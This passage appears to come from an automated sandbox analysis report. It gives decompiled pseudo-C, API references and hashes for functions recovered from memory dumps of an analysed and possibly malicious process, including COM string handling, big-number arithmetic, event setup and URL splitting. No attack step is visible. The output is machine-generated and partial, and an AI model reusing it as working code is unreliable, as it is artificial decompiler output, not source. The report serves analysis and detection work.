Part of subcall function 03C44E05: SysAllocString.OLEAUT32(03C4C290), ref: 03C44E55

SafeArrayDestroy.OLEAUT32(00000000), ref: 03C414EE
SysFreeString.OLEAUT32(00000000), ref: 03C414FD

Part of subcall function 03C452B9: Sleep.KERNEL32(000001F4), ref: 03C45301

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: b3af286c46d784f072d8e6ddae884c7eb8d3369377d6f7bca17c5f6a79c0f8c0
Instruction ID: ce3dfd1cca9d1b90625fb85f5966a71f7b32dbc49e4f69f10e8c239f44a6cd18
Opcode Fuzzy Hash: b3af286c46d784f072d8e6ddae884c7eb8d3369377d6f7bca17c5f6a79c0f8c0
Instruction Fuzzy Hash: 48516039900609EFDB11DFA8D844A9EF7B6FF88710F198469E949EB220DB31ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03C44E05, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E03C44E05(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x3c4d2a8; // 0xcaa5a8
					_t5 = _t103 + 0x3c4e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x3c4c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x3c4d2a8; // 0xcaa5a8
												_t28 = _t109 + 0x3c4e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x3c4d2a8; // 0xcaa5a8
														_t33 = _t79 + 0x3c4e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x03c44e0a
0x03c44e13
0x03c44e14
0x03c44e18
0x03c44e1e
0x03c44e24
0x03c44e2d
0x03c44e33
0x03c44e3d
0x03c44e3f
0x03c44e45
0x03c44e4a
0x03c44e55
0x03c44e5b
0x03c44e60
0x03c44f82
0x03c44e66
0x03c44e66
0x03c44e73
0x03c44e79
0x03c44e7f
0x03c44e83
0x03c44e89
0x03c44e96
0x03c44e9a
0x03c44ea0
0x03c44ea3
0x03c44eab
0x03c44eac
0x03c44eb0
0x03c44eb4
0x03c44eb7
0x03c44eba
0x03c44ec0
0x03c44ec9
0x03c44ecf
0x03c44ed0
0x03c44ed3
0x03c44ed4
0x03c44ed5
0x03c44edd
0x03c44ede
0x03c44edf
0x03c44ee1
0x03c44ee5
0x03c44ee9
0x00000000
0x00000000
0x03c44eef
0x03c44ef8
0x03c44efe
0x03c44f08
0x03c44f0c
0x03c44f0e
0x03c44f1b
0x03c44f1f
0x03c44f27
0x03c44f2c
0x03c44f3e
0x03c44f40
0x03c44f46
0x03c44f46
0x03c44f4f
0x03c44f4f
0x03c44f51
0x03c44f57
0x03c44f57
0x03c44f5a
0x03c44f60
0x03c44f63
0x03c44f6c
0x00000000
0x00000000
0x00000000
0x03c44f6c
0x03c44ec0
0x03c44eba
0x03c44ea3
0x03c44f72
0x03c44f72
0x03c44f78
0x03c44f78
0x03c44f7e
0x03c44f7e
0x03c44f87
0x03c44f8d
0x03c44f8d
0x03c44e4a
0x03c44f96

APIs

SysAllocString.OLEAUT32(03C4C290), ref: 03C44E55
lstrcmpW.KERNEL32(00000000,0076006F), ref: 03C44F36
SysFreeString.OLEAUT32(00000000), ref: 03C44F4F
SysFreeString.OLEAUT32(?), ref: 03C44F7E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 545da1e8ef29653c4e1aa648466330e0e9cfdd34f6253e3ac7c0a0431809e5e4
Instruction ID: 0140c9877511b06e9db94aace90a3192b42a570894a7fccb8225b8498bc0a2f0
Opcode Fuzzy Hash: 545da1e8ef29653c4e1aa648466330e0e9cfdd34f6253e3ac7c0a0431809e5e4
Instruction Fuzzy Hash: 96515075D00609EFDB14DFE8C8889AEF7B9FF88704B254594E915EB224D731AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C429ED, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03C429ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E03C48B37(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E03C44AA4(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E03C42F01(_t101,  &_v236, _a8, _t96 - _t81);
					E03C42F01(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E03C44AA4(_t101, 0x3c4d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E03C44AA4(_a16, _a4);
						E03C428BA(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L03C4AF6E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L03C4AF68();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E03C49947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E03C44506(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E03C4A708(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x3c4d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x03c429f0
0x03c429fc
0x03c42a02
0x03c42a07
0x03c42a0b
0x03c42b68
0x03c42b6c
0x03c42b6c
0x03c42a11
0x03c42a15
0x03c42a19
0x03c42a1c
0x03c42a27
0x03c42a2d
0x03c42a32
0x03c42a35
0x03c42a4f
0x03c42a5b
0x03c42a64
0x03c42a6e
0x03c42a73
0x03c42a75
0x03c42a78
0x03c42b26
0x03c42b2c
0x03c42b3d
0x03c42b50
0x03c42b60
0x00000000
0x03c42b65
0x03c42a81
0x03c42a88
0x03c42a8c
0x03c42a92
0x03c42a94
0x03c42a96
0x03c42a98
0x03c42a9a
0x03c42aa4
0x03c42aa9
0x03c42aab
0x03c42aad
0x03c42aae
0x03c42aaf
0x03c42ab0
0x03c42ab7
0x03c42abe
0x03c42ac1
0x03c42ac1
0x03c42a8e
0x03c42a8e
0x03c42a8e
0x03c42ac9
0x03c42ad1
0x03c42ada
0x03c42adf
0x03c42adf
0x03c42ae4
0x00000000
0x00000000
0x03c42ae6
0x03c42ae9
0x03c42af3
0x00000000
0x00000000
0x03c42af5
0x03c42af5
0x03c42aff
0x03c42adf
0x03c42ae4
0x00000000
0x00000000
0x00000000
0x03c42ae4
0x03c42b09
0x03c42b0c
0x03c42b0f
0x03c42b16
0x03c42b16
0x03c42b23
0x00000000
0x03c42b23
0x03c42a1e
0x03c42a22
0x03c42a23
0x03c42a25
0x00000000
0x00000000
0x00000000
0x03c42a25
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 03C42A9A
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03C42AB0
memset.NTDLL ref: 03C42B50
memset.NTDLL ref: 03C42B60

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 4b10f2855068d6d45f4bc8ebcafafa982447c855a8edf4ff3b88ecc66d56ba3c
Instruction ID: 7f7a7585a988e07712b758fe50748d8f0bbbb1ad1345910e2e3a75f8bdd8e98d
Opcode Fuzzy Hash: 4b10f2855068d6d45f4bc8ebcafafa982447c855a8edf4ff3b88ecc66d56ba3c
Instruction Fuzzy Hash: 4041B135A00309ABDB20DFA9CC81BEEB779EF44310F118929FD16EB180DB709A45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00418837, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

__initterm.LIBCMTD ref: 0041892A
__initterm.LIBCMTD ref: 0041893C
__CrtSetDbgFlag.LIBCMTD ref: 0041894F
___freeCrtMemory.LIBCMTD ref: 00418966

Part of subcall function 0041BC20: RtlEncodePointer.NTDLL(00000000,?,00418A6B,?,?,0041BD90), ref: 0041BC27

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __initterm$EncodeFlagMemoryPointer___free
String ID:
API String ID: 2654307729-0
Opcode ID: 89107db8a58949abae89dbd7c327ffe54bbebb2ea022ed3988830b7164ef41e8
Instruction ID: 9a1a6b102733eddea4821b9f60614b30e35b2b011fc6971cb3e57d2401d20101
Opcode Fuzzy Hash: 89107db8a58949abae89dbd7c327ffe54bbebb2ea022ed3988830b7164ef41e8
Instruction Fuzzy Hash: 9A41E6B5D003089FDB04DFA4E9846EEBBB1FB48314F24812EE415B6790DB385881CF69

Uniqueness

Uniqueness Score: -1.00%

Function 03C45F58, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E03C45F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E03C41525(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x03c45f64
0x03c45f68
0x03c45f69
0x03c45f6a
0x03c45f6c
0x03c45f6e
0x03c45f71
0x03c45f76
0x03c4600d
0x03c46014
0x03c46014
0x03c45f7f
0x03c45f86
0x03c45f96
0x03c45f96
0x03c45f9c
0x03c45f9e
0x03c45fa3
0x03c45fac
0x03c45fb2
0x03c45fb7
0x03c45fc2
0x03c45fc6
0x03c45fc8
0x03c45fc9
0x03c45fd2
0x03c45fd6
0x03c45fe7
0x03c45fd8
0x03c45fdd
0x03c45fe2
0x03c45ff1
0x03c45ff1
0x03c45fc6
0x03c45ff7
0x03c45ffd
0x03c45ffd
0x03c46006
0x03c4600b
0x03c4600b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 03C45F86
lstrlenW.KERNEL32(?), ref: 03C45FBC
memcpy.NTDLL(00000000,?,?,?), ref: 03C45FDD
SysFreeString.OLEAUT32(?), ref: 03C45FF1

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 99aa99b9e60444992b7fdc1bb8ac12888087544b9224d81ee75e78868d5dc4f1
Instruction ID: 3ea6a521f9a5a9a02d2d048d336a106fbe5241eac4b02afa3b40e02a7e9dbb96
Opcode Fuzzy Hash: 99aa99b9e60444992b7fdc1bb8ac12888087544b9224d81ee75e78868d5dc4f1
Instruction Fuzzy Hash: 78217F79901209FFDB11DFA8D88499EBBB8FF49300F1481A9E945EB214EB31DA00DF61

Uniqueness

Uniqueness Score: -1.00%

Function 03C48C01, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C48C01(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x03c48c0b
0x03c48c0f
0x03c48c24
0x03c48c26
0x03c48c2b
0x03c48c31
0x03c48c33
0x03c48c38
0x03c48c43
0x03c48c3a
0x03c48c3a
0x03c48c3a
0x03c48c38
0x03c48c51

APIs

memset.NTDLL ref: 03C48C0F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 03C48C24
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 03C48C31
CloseHandle.KERNEL32(?), ref: 03C48C43

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 3ec69253eb078d3da6749f185e8af38486565335cda149ff41c8f71942cbcd0c
Instruction ID: d63cce7df90f5045e8022bd2f1b3a1fb004ad11816862d510f8933bbaa02d2b1
Opcode Fuzzy Hash: 3ec69253eb078d3da6749f185e8af38486565335cda149ff41c8f71942cbcd0c
Instruction Fuzzy Hash: 4DF082B510530CBFD324AF26DCC4C2BFBECEB41199B11892EF142C2111C672AC498AA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C44DB1, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C44DB1() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x3c4d26c; // 0x1ac
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x3c4d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x3c4d26c; // 0x1ac
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x3c4d238; // 0x4500000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x03c44db1
0x03c44db8
0x03c44e02
0x03c44e04
0x03c44e04
0x03c44dbc
0x03c44dc2
0x03c44dc7
0x03c44dcb
0x03c44dd1
0x03c44dd8
0x00000000
0x00000000
0x03c44dda
0x03c44ddf
0x00000000
0x00000000
0x00000000
0x03c44ddf
0x03c44de1
0x03c44de9
0x03c44dec
0x03c44dec
0x03c44df2
0x03c44df9
0x03c44dfc
0x03c44dfc
0x00000000

APIs

SetEvent.KERNEL32(000001AC,00000001,03C47F41), ref: 03C44DBC
SleepEx.KERNEL32(00000064,00000001), ref: 03C44DCB
CloseHandle.KERNEL32(000001AC), ref: 03C44DEC
HeapDestroy.KERNEL32(04500000), ref: 03C44DFC

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 5adff8a917452050fa872801deb8d86feeaee3bdc1ce3edf479d4ba2cf6c9c87
Instruction ID: 9a7a747d34e32eb9ae36f6122bde3b517329bdba98027198852ea83835d7115c
Opcode Fuzzy Hash: 5adff8a917452050fa872801deb8d86feeaee3bdc1ce3edf479d4ba2cf6c9c87
Instruction Fuzzy Hash: A6F06C7970231197DB34BF36D84CF07BBE8AB047617198210F911DB29ACF60DD40D560

Uniqueness

Uniqueness Score: -1.00%

Function 03C45B05, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C45B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E03C47B3B(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E03C42D2E(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E03C4A38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x3c4d238, 0, _t25);
				}
				return _t22;
			}

0x03c45b05
0x03c45b16
0x03c45b1a
0x03c45b75
0x03c45b1c
0x03c45b23
0x03c45b2b
0x03c45b33
0x03c45b37
0x03c45b3d
0x03c45b45
0x03c45b48
0x03c45b60
0x03c45b60
0x03c45b6b
0x03c45b6b
0x03c45b7c

APIs

Part of subcall function 03C47B3B: lstrlen.KERNEL32(?,00000000,048F9C18,00000000,03C45142,048F9E3B,?,?,?,?,?,69B25F44,00000005,03C4D00C), ref: 03C47B42
Part of subcall function 03C47B3B: mbstowcs.NTDLL ref: 03C47B6B
Part of subcall function 03C47B3B: memset.NTDLL ref: 03C47B7D

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,048F935C), ref: 03C45B3D
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,048F935C), ref: 03C45B6B

Strings

Ut, xrefs: 03C45B6B

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Ut
API String ID: 1500278894-8415677
Opcode ID: 31f30e6f5950ca77977546f7c3177e0a7e283dc0486cb81c0a3532e3d58cce66
Instruction ID: 62499de338f106fa5dd5a743f09b71d1904f9a36843598cd5d428a0804b5d4e1
Opcode Fuzzy Hash: 31f30e6f5950ca77977546f7c3177e0a7e283dc0486cb81c0a3532e3d58cce66
Instruction Fuzzy Hash: 4E018F3A600209BBDB21AFA5DC44F9F7BB9EF85750F004429FA01DA1A0EB71D955D750

Uniqueness

Uniqueness Score: -1.00%

Function 03C48CFA, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E03C48CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E03C41525(_t2);
				if(_t34 != 0) {
					_t30 = E03C41525(_t28);
					if(_t30 == 0) {
						E03C48B22(_t34);
					} else {
						_t39 = _a4;
						_t22 = E03C4A7C2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E03C4A7C2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x03c48cfa
0x03c48d04
0x03c48d06
0x03c48d0c
0x03c48d0c
0x03c48d15
0x03c48d19
0x03c48d25
0x03c48d29
0x03c48d9d
0x03c48d2b
0x03c48d2b
0x03c48d2f
0x03c48d34
0x03c48d39
0x03c48d53
0x03c48d42
0x03c48d42
0x03c48d46
0x03c48d49
0x03c48d4e
0x03c48d4e
0x03c48d58
0x03c48d80
0x03c48d86
0x03c48d89
0x03c48d5a
0x03c48d5c
0x03c48d64
0x03c48d6f
0x03c48d74
0x03c48d74
0x03c48d90
0x03c48d97
0x03c48d98
0x03c48d98
0x03c48d29
0x03c48da8

APIs

lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,03C49816,?,?,?,?,00000102,03C4937B,?,?,00000000), ref: 03C48D06

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

Part of subcall function 03C4A7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,03C48D34,00000000,00000001,00000001,?,?,03C49816,?,?,?,?,00000102), ref: 03C4A7D0
Part of subcall function 03C4A7C2: StrChrA.SHLWAPI(?,0000003F,?,?,03C49816,?,?,?,?,00000102,03C4937B,?,?,00000000,00000000), ref: 03C4A7DA

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03C49816,?,?,?,?,00000102,03C4937B,?), ref: 03C48D64
lstrcpy.KERNEL32(00000000,00000000), ref: 03C48D74
lstrcpy.KERNEL32(00000000,00000000), ref: 03C48D80

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 8e1b0282d7dccf7e2ba931cd2fb0b9f47fb0f4da46cf5a7c984cc232ed38e75a
Instruction ID: 002aa46da467d916f48fa522d55c384a839d551371f3b913c95caf4888f67301
Opcode Fuzzy Hash: 8e1b0282d7dccf7e2ba931cd2fb0b9f47fb0f4da46cf5a7c984cc232ed38e75a
